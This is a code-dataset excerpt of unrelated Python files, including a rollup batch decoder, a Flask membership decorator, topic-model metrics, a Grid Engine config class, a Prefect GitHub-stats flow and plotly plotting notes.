tx_hash = "0x" + tx.hash.hex()
from_address = "0x" + tx.sender.hex()
return from_address, tx_hash
sub_data = data[2 + 2 * position :][: length * 2]
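        # Packed sequencer transaction layout, as unpacked below (byte offsets within sub_data):
        # [0] EIP-155 flag, [1:33] r, [33:65] s, [65] v, [66:69] gas limit, [69:72] gas price,
        # [72:75] nonce, [75:95] to address, [95:] ABI-encoded calldata.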
is_eip155 = int(sub_data[:2])
r = sub_data[2 : 33 * 2]
s = sub_data[33 * 2 : 65 * 2]
v = sub_data[65 * 2 : 66 * 2]
gas_limit = int(sub_data[66 * 2 : 69 * 2], 16)
gas_price = int(sub_data[69 * 2 : 72 * 2], 16)
nonce = int(sub_data[72 * 2 : 75 * 2], 16)
to_address = "0x" + sub_data[75 * 2 : 95 * 2]
data = sub_data[95 * 2 :]
signature = decode_from_4byte("0x" + data[:8], decoded_methods)
input_data = data[8:]
transaction = dict(
eip155=(is_eip155 == 0),
r=r,
s=s,
v=v,
gas_limit=gas_limit,
gas_price=gas_price,
nonce=nonce,
to_address=to_address,
value=0,
data=data,
signature=signature,
input=input_data,
)
transaction["from_address"], transaction["tx_hash"] = ECDSA_recover(transaction)
transaction.pop("data")
return transaction
decoded_methods = dict()
data = "0x00000000" + data
shouldStartAtElement = load_call_data(data, 4, 5)
totalElementsToAppend = load_call_data(data, 9, 3)
numContexts = load_call_data(data, 12, 3)
numTransactions = 0
batch = dict(
shouldStartAtElement=shouldStartAtElement,
totalElementsToAppend=totalElementsToAppend,
numContexts=numContexts,
contexts=[],
)
nextTransactionPtr = BATCH_CONTEXT_START_POS + BATCH_CONTEXT_SIZE * numContexts
for i in range(numContexts):
contextPtr = 15 + i * BATCH_CONTEXT_SIZE
numSequencedTransactions = load_call_data(data, contextPtr, 3)
numSubsequentQueueTransactions = load_call_data(data, contextPtr + 3, 3)
ctxTimestamp = datetime.utcfromtimestamp(
load_call_data(data, contextPtr + 6, 5)
)
ctxBlockNumber = load_call_data(data, contextPtr + 11, 5)
context = dict(
numSequencedTransactions=numSequencedTransactions,
numSubsequentQueueTransactions=numSubsequentQueueTransactions,
ctxTimestamp=ctxTimestamp,
ctxBlockNumber=ctxBlockNumber,
ctxSequencedTransactions=[],
)
for _ in range(numSequencedTransactions):
txDataLength = load_call_data(data, nextTransactionPtr, 3)
transactionData = load_tx_data(data, nextTransactionPtr + 3, txDataLength)
context["ctxSequencedTransactions"].append(transactionData)
numTransactions += 1
nextTransactionPtr += TX_DATA_HEADER_SIZE + txDataLength
batch["contexts"].append(context)
batch["numTransactions"] = numTransactions
return batch
def decode_ovm_message(data):
target = gas_limit = data
signature = input_data = None
transaction = dict(
eip155=Transaction,
r=None,
s=None,
v=None,
gas_limit=gas_limit,
gas_price=0,
nonce=0,
to_address=target,
value=0,
data=data,
signature=signature,
input=input_data,
)
context = dict(
ctxTimestamp=None, ctxBlockNumber=None, ctxSequencedTransactions=[transaction]
)
batch = dict(numContexts=1, contexts=[context])
return batch
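# Usage sketch: resolve a well-known 4-byte selector. 0xa9059cbb is the selector of the ERC-20
# transfer(address,uint256) function; the cache dict avoids repeated calls to 4byte.directory.
if __name__ == "__main__":
    selector_cache = {}
    print(decode_from_4byte("0xa9059cbb", selector_cache))
    print(selector_cache)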
| StarcoderdataPython |
1777669 | <reponame>LittleNed/toontown-stride
from toontown.coghq.SpecImports import *
LobbyParent = 10014
LobbyCell = 0
BattleCells = {}
ReserveCogData = []
CogData = [] | StarcoderdataPython |
1602617 | #import functions
from mcpi.minecraft import Minecraft
from time import sleep
#define variables
mc = Minecraft.create()
flower = 38
#mainloop
while True:
x, y, z = mc.player.getPos()
mc.setBlock(x, y, z, flower)
sleep(0.1)
| StarcoderdataPython |
1654115 | <reponame>jazzband/join
import wrapt
from flask import flash, redirect
from flask_login import current_user
from ..account.views import default_url
def member_required(next_url=None, message=None):
if message is None:
message = "Sorry but you're not a member of Jazzband at the moment."
@wrapt.decorator
def wrapper(wrapped, instance, args, kwargs):
"""
If you decorate a view with this, it will ensure that the current user is
a Jazzband member.
:param func: The view function to decorate.
:type func: function
"""
nonlocal next_url
if next_url is None:
next_url = default_url()
if (
not current_user.is_member
or current_user.is_banned
or current_user.is_restricted
):
flash(message)
return redirect(next_url)
return wrapped(*args, **kwargs)
return wrapper
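# Usage sketch (route and view names are illustrative): stack the decorator under app.route so
# non-members are flashed a message and redirected before the view body runs.
#
#     @app.route("/internal/dashboard")
#     @member_required(message="Sorry, Jazzband members only.")
#     def internal_dashboard():
#         return render_template("internal/dashboard.html")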
| StarcoderdataPython |
199807 | from .dart_command import DartCommand
import sublime_plugin
class PubAddCommand(DartCommand):
def run(self, package_name):
if project := super().project():
project.pub_add(package_name)
def input(self, _):
return PackageNameInputHandler()
class PackageNameInputHandler(sublime_plugin.TextInputHandler):
def name(self):
return "package_name"
def validate(self, arg: str) -> bool:
return bool(arg)
def placeholder(self):
return "package_name[:@x.y.z]"
| StarcoderdataPython |
1604336 | import torch
import numpy as np
def get_topic_diversity(beta, topk):
num_topics = beta.shape[0]
list_w = np.zeros((num_topics, topk))
for k in range(num_topics):
idx = beta[k,:].argsort()[-topk:][::-1]
list_w[k,:] = idx
n_unique = len(np.unique(list_w))
TD = n_unique / (topk * num_topics)
print('Topic diversity is: {}'.format(TD))
def get_document_frequency(data, wi, wj=None):
if wj is None:
D_wi = 0
for l in range(len(data)):
doc = data[l].squeeze(0)
if len(doc) == 1:
continue
else:
doc = doc.squeeze()
if wi in doc:
D_wi += 1
return D_wi
D_wj = 0
D_wi_wj = 0
for l in range(len(data)):
doc = data[l].squeeze(0)
if len(doc) == 1:
doc = [doc.squeeze()]
else:
doc = doc.squeeze()
if wj in doc:
D_wj += 1
if wi in doc:
D_wi_wj += 1
return D_wj, D_wi_wj
def get_topic_coherence(beta, data, vocab):
D = len(data) ## number of docs...data is list of documents
#print('D: ', D)
TC = []
num_topics = len(beta)
for k in range(num_topics):
#print('k: {}/{}'.format(k, num_topics))
top_10 = list(beta[k].argsort()[-11:][::-1])
top_words = [vocab[a] for a in top_10]
TC_k = 0
counter = 0
for i, word in enumerate(top_10):
# get D(w_i)
D_wi = get_document_frequency(data, word)
j = i + 1
tmp = 0
while j < len(top_10) and j > i:
# get D(w_j) and D(w_i, w_j)
D_wj, D_wi_wj = get_document_frequency(data, word, top_10[j])
# get f(w_i, w_j)
if D_wi_wj == 0:
f_wi_wj = -1
else:
f_wi_wj = -1 + ( np.log(D_wi) + np.log(D_wj) - 2.0 * np.log(D) ) / ( np.log(D_wi_wj) - np.log(D) )
# update tmp:
tmp += f_wi_wj
j += 1
counter += 1
# update TC_k
TC_k += tmp
TC.append(TC_k)
#print('counter: ', counter)
#print('num topics: ', len(TC))
TC = np.mean(TC) / counter
print('Topic coherence is: {}'.format(TC))
def nearest_neighbors(word, embeddings, vocab):
vectors = embeddings.data.cpu().numpy()
index = vocab.index(word)
print('vectors: ', vectors.shape)
query = vectors[index]
print('query: ', query.shape)
ranks = vectors.dot(query).squeeze()
denom = query.T.dot(query).squeeze()
denom = denom * np.sum(vectors**2, 1)
denom = np.sqrt(denom)
ranks = ranks / denom
mostSimilar = []
[mostSimilar.append(idx) for idx in ranks.argsort()[::-1]]
nearest_neighbors = mostSimilar[:20]
nearest_neighbors = [vocab[comp] for comp in nearest_neighbors]
return nearest_neighbors
import nltk
from nltk.collocations import *
import matplotlib.pyplot as plt
import os
PLOT_PATH = '.'  # assumed output directory for plot_word_cloud below; the original module never defines it
def bigrams(big_document):
ignored_words = nltk.corpus.stopwords.words('english')
ignored_words.append('percent')
ignored_words.append('governor')
ignored_words.append('dont')
# bigram_measures = nltk.collocations.BigramAssocMeasures()
finder = BigramCollocationFinder.from_documents(big_document)
finder.apply_word_filter(lambda w: len(w) < 3 or w.lower() in ignored_words)
finder.apply_freq_filter(150)
return [' '.join(x) for x in list(finder.ngram_fd.keys())]
def trigram(big_document):
ignored_words = nltk.corpus.stopwords.words('english')
ignored_words.append('percent')
ignored_words.append('governor')
ignored_words.append('dont')
# trigram_measures = nltk.collocations.TrigramAssocMeasures()
finder = TrigramCollocationFinder.from_documents(big_document)
finder.apply_word_filter(lambda w: len(w) < 3 or w.lower() in ignored_words)
finder.apply_freq_filter(100)
return [' '.join(x) for x in list(finder.ngram_fd.keys())]
def replace_collocation(string, dict_collocation):
for key in dict_collocation.keys():
string = string.replace(key, dict_collocation[key])
return string
def plot_word_cloud(text, filename='wordcloud.eps', format='eps',
width=1000, height=500, background_color='white', figsize=(10,6), dpi=100, bbox_inches='tight'):
from wordcloud import WordCloud
meeting_string = (" ").join([word for line in text for word in line])
wordcloud = WordCloud(width=width, height=height, background_color=background_color).generate(meeting_string)
fig = plt.figure(figsize=figsize)
plt.subplots_adjust(left=0, right=1, top=1, bottom=0)
plt.imshow(wordcloud)
plt.axis("off")
fig.tight_layout()
plt.savefig(os.path.join(PLOT_PATH, filename), format=format, dpi=dpi, bbox_inches=bbox_inches)
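# Usage sketch: evaluate topic diversity on a random topic-word matrix; the shapes
# (10 topics over a 100-word vocabulary) are illustrative only.
if __name__ == "__main__":
    demo_beta = np.random.rand(10, 100)
    get_topic_diversity(demo_beta, topk=25)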
| StarcoderdataPython |
1736789 | """Package info"""
__version__ = '0.6.0'
__author__ = '<NAME> et al.'
__author_email__ = '<EMAIL>'
__license__ = 'Apache-2.0'
__copyright__ = 'Copyright (c) 2018-2019, %s.' % __author__
__homepage__ = 'https://github.com/PyTorchLightning/pytorch-lightning'
# this has to be simple string, see: https://github.com/pypa/twine/issues/522
__docs__ = "PyTorch Lightning is the lightweight PyTorch wrapper for ML researchers." \
" Scale your models. Write less boilerplate."
try:
# This variable is injected in the __builtins__ by the build
    # process. It is used to enable importing subpackages of pytorch-lightning
    # when the binaries are not built
__LIGHTNING_SETUP__
except NameError:
__LIGHTNING_SETUP__ = False
if __LIGHTNING_SETUP__:
import sys
    sys.stderr.write('Partial import of pytorch-lightning during the build process.\n')
    # We are not importing the rest of the package during the build
    # process, as it may not be compiled yet
else:
from .trainer.trainer import Trainer
from .core.lightning import LightningModule
from .core.decorators import data_loader
import logging
__all__ = [
'Trainer',
'LightningModule',
'data_loader',
]
logging.basicConfig(level=logging.INFO)
| StarcoderdataPython |
3367542 | <filename>solum-6.0.0/solum/tests/common/test_hacking.py<gh_stars>0
# Copyright 2015 Intel, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import pep8
import textwrap
from solum.hacking import checks
from solum.tests import base
class HackingTestCase(base.BaseTestCase):
# We are patching pep8 so that only the check under test is actually
# installed.
@mock.patch('pep8._checks',
{'physical_line': {}, 'logical_line': {}, 'tree': {}})
def _run_check(self, code, checker, filename=None):
pep8.register_check(checker)
lines = textwrap.dedent(code).strip().splitlines(True)
checker = pep8.Checker(filename=filename, lines=lines)
checker.check_all()
checker.report._deferred_print.sort()
return checker.report._deferred_print
def _assert_has_errors(self, code, checker, expected_errors=None,
filename=None):
actual_errors = [e[:3] for e in
self._run_check(code, checker, filename)]
self.assertEqual(expected_errors or [], actual_errors)
def _assert_has_no_errors(self, code, checker, filename=None):
self._assert_has_errors(code, checker, filename=filename)
def test_no_mutable_default_args(self):
self.assertEqual(1, len(list(checks.no_mutable_default_args(
"def get_info_from_bdm(virt_type, bdm, mapping=[])"))))
self.assertEqual(0, len(list(checks.no_mutable_default_args(
"defined = []"))))
self.assertEqual(0, len(list(checks.no_mutable_default_args(
"defined, undefined = [], {}"))))
| StarcoderdataPython |
1626210 | <reponame>gridengine/config-api<gh_stars>1-10
#!/usr/bin/env python
#
# ___INFO__MARK_BEGIN__
#######################################################################################
# Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.)
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################################
# ___INFO__MARK_END__
#
import copy
import datetime
import json
import os
import tempfile
from uge.config.config_manager import ConfigManager
from uge.exceptions.invalid_argument import InvalidArgument
from uge.exceptions.invalid_request import InvalidRequest
class QconfObject(object):
""" This class encapsulates data and functionality common to all Qconf API objects. """
VERSION = '1.0'
NAME_KEY = None
UGE_PYTHON_OBJECT_MAP = {
'NONE': None,
'INFINITY': float('inf'),
'TRUE': True,
'FALSE': False,
}
UGE_CASE_SENSITIVE_KEYS = {}
USER_PROVIDED_KEYS = []
REQUIRED_DATA_DEFAULTS = {}
BOOL_KEY_MAP = {}
INT_KEY_MAP = {}
FLOAT_KEY_MAP = {}
LIST_KEY_MAP = {}
DEFAULT_LIST_DELIMITER = ','
DICT_KEY_MAP = {}
DEFAULT_DICT_DELIMITER = ','
DICT_VALUE_DELIMITER = '='
OPTIONAL_KEYS_ALLOWED = False
def __init__(self, name=None, data=None, metadata=None, json_string=None):
"""
Class constructor.
:param name: Object name. If provided, it will override object's name from data or JSON string parameters.
:type name: str
:param data: Object data. If provided, it will override corresponding data from object's JSON string representation.
:type data: varies
:param metadata: Object metadata. If provided, it will override corresponding metadata from object's JSON string representation.
:type metadata: dict
:param json_string: Object's JSON string representation.
:type json_string: str
:raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not contain dictionary representing a Qconf object.
"""
self.name = name
self.metadata = {}
if not hasattr(self, 'data'):
self.data = {}
# Unpack and check json
json_dict = self.unpack_input_json(json_string)
if json_dict:
if 'data' in json_dict:
self.data = json_dict.get('data')
del json_dict['data']
self.metadata = json_dict
# Merge json entries with provided metadata
if metadata:
self.check_input_metadata(metadata)
self.metadata.update(metadata)
# Merge json entries with provided data
if data:
self.check_input_data(data)
if type(data) == dict:
self.data.update(data)
else:
self.data = data
if name and self.NAME_KEY:
self.data[self.NAME_KEY] = name
# Convert list and dict keys
self.convert_list_keys()
self.convert_dict_keys()
# Add standard metadata
self.metadata['object_version'] = self.VERSION
self.metadata['object_class'] = self.__class__.__name__
def unpack_input_json(self, json_string):
if not json_string:
return None
try:
json_dict = json.loads(json_string)
except Exception as ex:
raise InvalidArgument('Input is not a valid json string: %s (error: %s).' % (str(json_string), ex))
if type(json_dict) != dict:
raise InvalidArgument('Input json string does not contain dictionary: %s.' % str(json_string))
return json_dict
def check_user_provided_keys(self):
"""
Checks for presence of all data keys that must be provided by user.
:raises: **InvalidRequest** - in case object's data is not a dictionary, or if any of the required keys are missing.
"""
if type(self.data) != dict:
raise InvalidRequest('Data object is not a dictionary: %s.' % str(self.data))
for key in self.USER_PROVIDED_KEYS:
if not self.data.get(key):
raise InvalidRequest('Input data is missing required object key: %s.' % str(key))
def check_input_data(self, data):
pass
def check_input_metadata(self, metadata):
if metadata:
if type(metadata) != dict:
raise InvalidArgument('Provided metadata is not a dictionary: %s.' % str(metadata))
def remove_optional_keys(self):
"""
Removes values for keys that are not required from object's data.
:raises: **InvalidRequest** - in case object's data is not a dictionary.
"""
if self.OPTIONAL_KEYS_ALLOWED:
return
if type(self.data) != dict:
raise InvalidRequest('Data object is not a dictionary: %s.' % str(self.data))
removed_keys = []
for (key, value) in list(self.data.items()):
if key not in self.get_required_data_defaults():
if key not in self.USER_PROVIDED_KEYS and not key.startswith('#'):
removed_keys.append(key)
for key in removed_keys:
del self.data[key]
def update_with_required_data_defaults(self):
"""
Updates object with default values for required data keys.
:raises: **InvalidArgument** - in case object's data is not a dictionary.
"""
if type(self.data) != dict:
raise InvalidRequest('Data object is not a dictionary: %s.' % str(self.data))
for (key, value) in list(self.get_required_data_defaults().items()):
if key not in self.data:
                if type(value) == str:
for env_var in ['SGE_ROOT', 'SGE_CELL']:
value = value.replace(env_var, os.environ[env_var])
self.data[key] = value
def get_tmp_file(self):
fd, tmp_file_path = tempfile.mkstemp(text=True)
tmp_file = os.fdopen(fd, 'w')
tmp_dir_path = None
return (tmp_file, tmp_file_path, tmp_dir_path)
def get_required_data_defaults(self):
return self.REQUIRED_DATA_DEFAULTS
def convert_list_keys(self):
for key in list(self.LIST_KEY_MAP.keys()):
value = self.data.get(key)
if value is not None:
if type(value) == bytes or type(value) == str:
delimiter = self.LIST_KEY_MAP.get(key, self.DEFAULT_LIST_DELIMITER)
self.data[key] = value.split(delimiter)
elif type(value) != list:
raise InvalidArgument(
'Value for key %s must be provided either as a string, or as a python list of strings.' % key)
def parse_value_as_dict(self, key, value):
delimiter = self.DICT_KEY_MAP.get(key, self.DEFAULT_LIST_DELIMITER)
items = value.split(delimiter)
value_dict = {}
for item in items:
if item.find(self.DICT_VALUE_DELIMITER) < 0:
raise InvalidArgument(
'Cannot parse dictionary value: Unexpected format of item %s for key %s.' % (item, key))
item_tokens = item.split(self.DICT_VALUE_DELIMITER)
item_key = item_tokens[0]
item_value = self.DICT_VALUE_DELIMITER.join(item_tokens[1:])
value_dict[item_key] = self.uge_to_py(item_key, item_value)
return value_dict
def convert_dict_keys(self):
for key in list(self.DICT_KEY_MAP.keys()):
value = self.data.get(key)
if value is not None:
                if type(value) == str:
self.data[key] = self.parse_value_as_dict(key, value)
elif type(value) != dict:
raise InvalidArgument(
'Value for key %s must be provided either as a string, or as a python dictionary.' % key)
def set_data_dict_from_qconf_output(self, qconf_output):
data = self.to_dict(qconf_output)
self.data = data
@classmethod
def get_list_from_qconf_output(cls, qconf_output):
qconf_output = qconf_output.strip()
qconf_list = []
if len(qconf_output):
qconf_list = qconf_output.split('\n')
return qconf_list
@classmethod
def get_bool_key_map(cls, key_map):
bool_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == bool:
bool_key_map[key] = value
elif type(value) == dict:
for (key2, value2) in list(value.items()):
if type(value2) == bool:
bool_key_map[key2] = value2
return bool_key_map
@classmethod
def get_int_key_map(cls, key_map):
int_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == int:
int_key_map[key] = value
elif type(value) == dict:
for (key2, value2) in list(value.items()):
if type(value2) == int:
int_key_map[key2] = value2
return int_key_map
@classmethod
def get_float_key_map(cls, key_map):
float_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == float:
float_key_map[key] = value
return float_key_map
@classmethod
def get_list_key_map(cls, key_map):
list_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == list:
list_key_map[key] = value
return list_key_map
def uge_to_py(self, key, value):
uppercase_value = value.upper()
for (uge_value, py_value) in list(self.UGE_PYTHON_OBJECT_MAP.items()):
if uge_value == uppercase_value:
return py_value
if key in self.LIST_KEY_MAP:
# Key is designated as list key.
# Try to split by corresponding delimiter.
delimiter = self.LIST_KEY_MAP.get(key)
if value.find(delimiter) > 0:
return value.split(delimiter)
else:
return [value]
elif key in self.DICT_KEY_MAP:
# Key is designated as dict key.
# Try to split by corresponding delimiter.
return self.parse_value_as_dict(key, value)
elif key in self.INT_KEY_MAP:
try:
return int(value)
            except (TypeError, ValueError):
# We cannot convert this string to int
pass
elif key in self.FLOAT_KEY_MAP:
try:
return float(value)
            except (TypeError, ValueError):
# We cannot convert this string to float
pass
elif value.find(self.DEFAULT_LIST_DELIMITER) > 0:
return value.split(self.DEFAULT_LIST_DELIMITER)
return value
def py_to_uge(self, key, value):
for (uge_value, py_value) in list(self.UGE_PYTHON_OBJECT_MAP.items()):
if value == py_value and type(value) == type(py_value):
if key in self.UGE_CASE_SENSITIVE_KEYS:
return self.UGE_CASE_SENSITIVE_KEYS[key](uge_value)
return uge_value
if type(value) == list:
delimiter = self.LIST_KEY_MAP.get(key, self.DEFAULT_LIST_DELIMITER)
return delimiter.join(value)
elif type(value) == dict:
delimiter = self.DICT_KEY_MAP.get(key, self.DEFAULT_DICT_DELIMITER)
dict_tokens = []
for (item_key, item_value) in list(value.items()):
dict_tokens.append('%s%s%s' % (item_key, self.DICT_VALUE_DELIMITER, item_value))
return delimiter.join(dict_tokens)
return value
def to_uge(self):
"""
Converts object to string acceptable as input for UGE qconf command.
:returns: Object's UGE-formatted string.
"""
lines = ''
for (key, value) in list(self.data.items()):
lines += '%s %s\n' % (key, self.py_to_uge(key, value))
return lines
def convert_data_to_uge_keywords(self, data):
for (key, value) in list(data.items()):
data[key] = self.py_to_uge(key, value)
def to_json(self, use_uge_keywords=False):
"""
Converts object to JSON string.
:param use_uge_keywords: if True, UGE keywords (e.g. 'NONE') are restored before conversion to JSON; otherwise, no changes are made to object's data. Default is False.
:type mode: bool
:returns: Object's JSON representation.
"""
json_dict = copy.copy(self.metadata)
data = copy.copy(self.data)
if use_uge_keywords:
self.convert_data_to_uge_keywords(data)
json_dict['data'] = data
return json.dumps(json_dict)
def to_dict(self, input_string):
lines = input_string.split('\n')
object_data = {}
for line in lines:
if not line:
continue
key_value = line.split(' ')
key = key_value[0]
value = line.replace(key, '', 1).strip()
object_data[key] = self.uge_to_py(key, value)
return object_data
def set_get_metadata(self):
"""
Sets default object metadata (user/timestamp) for API get operations.
"""
cm = ConfigManager.get_instance()
retrieved_by = '%s@%s' % (cm['user'], cm['host'])
self.metadata['retrieved_by'] = retrieved_by
self.metadata['retrieved_on'] = datetime.datetime.now().isoformat()
def set_modify_metadata(self):
"""
Sets default object metadata (user/timestamp) for API modify operations.
"""
cm = ConfigManager.get_instance()
modified_by = '%s@%s' % (cm['user'], cm['host'])
self.metadata['modified_by'] = modified_by
self.metadata['modified_on'] = datetime.datetime.now().isoformat()
def set_add_metadata(self):
"""
Sets default object metadata (user/timestamp) for API add operations.
"""
cm = ConfigManager.get_instance()
created_by = '%s@%s' % (cm['user'], cm['host'])
self.metadata['created_by'] = created_by
self.metadata['created_on'] = datetime.datetime.now().isoformat()
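# Usage sketch: a minimal illustrative subclass. Real API objects in this package (queues,
# host groups, ...) define richer key maps, defaults and a NAME_KEY of their own.
class _DemoQconfObject(QconfObject):
    NAME_KEY = 'name'
    USER_PROVIDED_KEYS = ['name']
    REQUIRED_DATA_DEFAULTS = {'slots': 1}
if __name__ == '__main__':
    demo = _DemoQconfObject(name='demo', data={'enabled': True})
    demo.update_with_required_data_defaults()
    print(demo.to_uge())                        # UGE key/value lines, e.g. "enabled TRUE"
    print(demo.to_json(use_uge_keywords=True))  # JSON with UGE keywords restored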
| StarcoderdataPython |
78076 | <reponame>andersy005/pydata-issue-tracker-datasette
import requests
import os
import collections
import pandas as pd
import datetime
import itertools
import pathlib
from prefect import Flow, task, unmapped, Parameter
from prefect.triggers import all_successful
headers = {'Authorization': f"token {os.environ['GH_TOKEN']}"}
@task(max_retries=3, retry_delay=datetime.timedelta(minutes=1))
def get_repo_data(project, time):
def run_query(
query, variables={}
): # A simple function to use requests.post to make the API call. Note the json= section.
request = requests.post(
'https://api.github.com/graphql',
json={'query': query, 'variables': variables},
headers=headers,
)
if request.status_code == 200:
return request.json()
else:
raise Exception(
'Query failed to run by returning code of {}. {}'.format(
request.status_code, query
)
)
entry = {'project': f'{project.org}/{project.repo}', 'time': time}
states = [('OPEN', 'OPEN'), ('CLOSED', 'MERGED')]
data = []
query = """
query($org:String!, $repo:String!, $issue_state:[IssueState!], $pr_state:[PullRequestState!]){
repository(owner: $org, name: $repo) {
issues(states: $issue_state) {
totalCount
}
pullRequests(states: $pr_state) {
totalCount
}
}
}"""
for items in states:
result = run_query(
query,
variables={
'org': project.org,
'repo': project.repo,
'issue_state': items[0],
'pr_state': items[1],
},
)
entry[f'{items[0].lower()}_issues'] = result['data']['repository'][
'issues'
]['totalCount']
entry[f'{items[1].lower()}_pull_requests'] = result['data']['repository'][
'pullRequests'
]['totalCount']
data.append(entry)
return data
@task
def merge_data(data):
entries = itertools.chain(*data)
df = pd.DataFrame(entries)
df['time'] = df.time.dt.round('H')
df['hour'] = df.time.dt.hour
df['day'] = df.time.dt.day
df['week'] = df.time.dt.isocalendar().week
df['weekend'] = df.time.dt.weekday.map(lambda x: 'weekday' if x < 5 else 'weekend')
df['quarter'] = df.time.dt.quarter.map({1: 'Q1: Jan - Mar', 2: 'Q2: Apr - Jun', 3: 'Q3: Jul - Sep', 4: 'Q4: Oct - Dec'})
return df
@task
def save_data(data, data_file):
try:
df = pd.read_json(data_file, convert_dates=['time'])
except Exception:
df = pd.DataFrame()
print(df.shape)
if not df.empty:
data = pd.concat([df, data])
data = data.drop_duplicates(subset=['project', 'time']).sort_values(by='time')
with open(data_file, 'w', encoding='utf-8') as outfile:
data.to_json(outfile, orient='records', indent=2, force_ascii=False)
def transform(row):
return [{'date': row.time.round('D'), 'type': 'open_issues', 'count': row.open_issues}, {'date': row.time.round('D'), 'type': 'open_pull_requests', 'count': row.open_pull_requests}]
@task
def save_project_weekly_data(project, path):
path = pathlib.Path(path)
columns= ['time', 'open_issues', 'open_pull_requests']
df = pd.read_json(path, convert_dates=['time'])
data = df[df.project == f'{project.org}/{project.repo}']
data = data[columns].groupby(data.time.dt.isocalendar().week).last()
results = pd.DataFrame(itertools.chain(*[transform(row) for _, row in data.iterrows()]))
outdir = path.parent / 'weekly'
outdir.mkdir(parents=True, exist_ok=True)
data_file = f'{outdir}/{project.repo}-weekly-data.json'
with open(data_file, 'w', encoding='utf-8') as outfile:
results.to_json(outfile, orient='records', indent=2, force_ascii=False)
with Flow('get_data') as flow:
Project = collections.namedtuple('Project', ['org', 'repo'])
projects = [
Project('pydata', 'xarray'),
Project('dask', 'dask'),
Project('dask', 'distributed'),
Project('numpy', 'numpy'),
Project('pandas-dev', 'pandas'),
Project('jupyterlab', 'jupyterlab'),
Project('matplotlib', 'matplotlib'),
]
path = Parameter('path', default=pathlib.Path('./data/data.json').absolute())
time = datetime.datetime.now()
data = get_repo_data.map(project=projects, time=unmapped(time))
df = merge_data(data)
x = save_data(df, data_file = path)
save_project_weekly_data.map(project=projects, path=unmapped(path), upstream_tasks=[unmapped(x)])
| StarcoderdataPython |
3264011 | <gh_stars>1-10
# https://plot.ly/python/
# https://docs.google.com/document/d/1DjWL2DxLiRaBrlD3ELyQlCBRu7UQuuWfgjv9LncNp_M/edit#heading=h.w8hlxhsxs4zj
from plotly.offline import iplot
from plotly.offline import init_notebook_mode
import plotly.graph_objs as go
init_notebook_mode(connected=True)
# BASICS -----------------------
# define layout
# define chart/data, keep in square brackets
# combine both into fig
# iplot them out
layout = go.Layout(width=500, \
height=500, \
title='Confusion Matrix', \
font=dict(size=8))
data = go.Heatmap(z=x,x=title,y=title)
fig = go.Figure(data=[data], layout=layout)
iplot(fig)
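# A self-contained version of the basic pattern above (dummy 2x2 values, since
# `x` and `title` in the snippet above are placeholders from the original notes):
example_z = [[1, 2], [3, 4]]
example_labels = ['A', 'B']
example_layout = go.Layout(width=400, height=400, title='Example Heatmap')
example_data = go.Heatmap(z=example_z, x=example_labels, y=example_labels)
example_fig = go.Figure(data=[example_data], layout=example_layout)
iplot(example_fig)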
# Scatterplot
iplot([go.Scatter(x=[1, 2, 3], y=[3, 1, 6], mode='markers', name='label')])
# Barchart
iplot([go.Bar(x=[1, 2, 3], y=[3, 1, 6])])
# multiple plots
trace0 = go.Scatter(
x = random_x, y = random_y0,
mode = 'markers',
name = 'markers')
trace1 = go.Scatter(
x = random_x, y = random_y1,
mode = 'lines+markers',
name = 'lines+markers')
trace2 = go.Scatter(
x = random_x, y = random_y2,
mode = 'lines',
name = 'lines')
data = [trace0, trace1, trace2]
iplot(data)
## COOKIE CUTTERS
# -----------------
# TIME-SERIES LINE WITH VOLUME STOCK DATA
apple = dfm[dfm['assetCode']=='AAPL.O']
data1 = go.Scatter(
x=apple.time,
y=apple['close'],
name='Price')
data2 = go.Bar(
x=apple.time,
y=apple.volume,
name='Volume',
yaxis='y2')
data = [data1, data2]
# set double y-axis
layout = go.Layout(
title='Closing Price & Volume for AAPL.O',
yaxis=dict(
title='Price'
),
yaxis2=dict(
overlaying='y',
side='right',
range=[0, 1500000000], #increase upper range so that the volume bars are short
showticklabels=False,
showgrid=False
)
)
fig = go.Figure(data=data,layout=layout)
iplot(fig)
# CANDLESTICK -----------
data = [go.Candlestick(x=df.index,
open=df.Open,
high=df.High,
low=df.Low,
close=df.Close)]
# add range slider, change to False if not needed
layout = go.Layout(
xaxis = dict(
rangeslider = dict(
visible = True)))
fig = go.Figure(data=data,layout=layout)
iplot(fig)
# RADAR CHART -----------
data = [go.Scatterpolar(
r = [4, 1, 0, 3, 2, 5],
theta = ['Condenser Fouling','Excess Oil','Non Condensarables', 'Reduced Condenser Water Flow',
'Reduced Evaporator Water Flow', 'Refrigerant Leak', 'Refrigerant Overcharged'],
fill = 'toself'
)]
layout = go.Layout(
polar = dict(
radialaxis = dict(
visible = True,
range = [0, 5])
),
showlegend = False,
title='Fault Severity'
)
iplot(go.Figure(data=data, layout=layout)) | StarcoderdataPython |
1766658 | # This file is saved as a .py file only because 'mat' is similar to a Python dictionary; it is documentation, nothing else
mat
{
'__header__': b'MATLAB 5.0 MAT-file, Platform: PCWIN64, Created on: Fri Nov 18 20:05:04 2016',
'__version__': '1.0',
'__globals__': [],
"""
### general structure of image_info ###
array1(
[
[
array2(
[
[
(
# array 2.1 is sparse matrix which is required to create density map of ground-truth
array2.1( [ [ 524.17564209, 611.31179232],....,[ 20.58878763, 594.48550124] ] ),
array2.2( [ [277] ] )
)
]
]
)
]
]
)
"""
# extra explanation about 2d numpy array
# let a = np.array( [ [1,2,3],[4,5,6],[7,8,9] ] )
# a.shape = (3,3)
# so 'a' will look like ,
# a = [
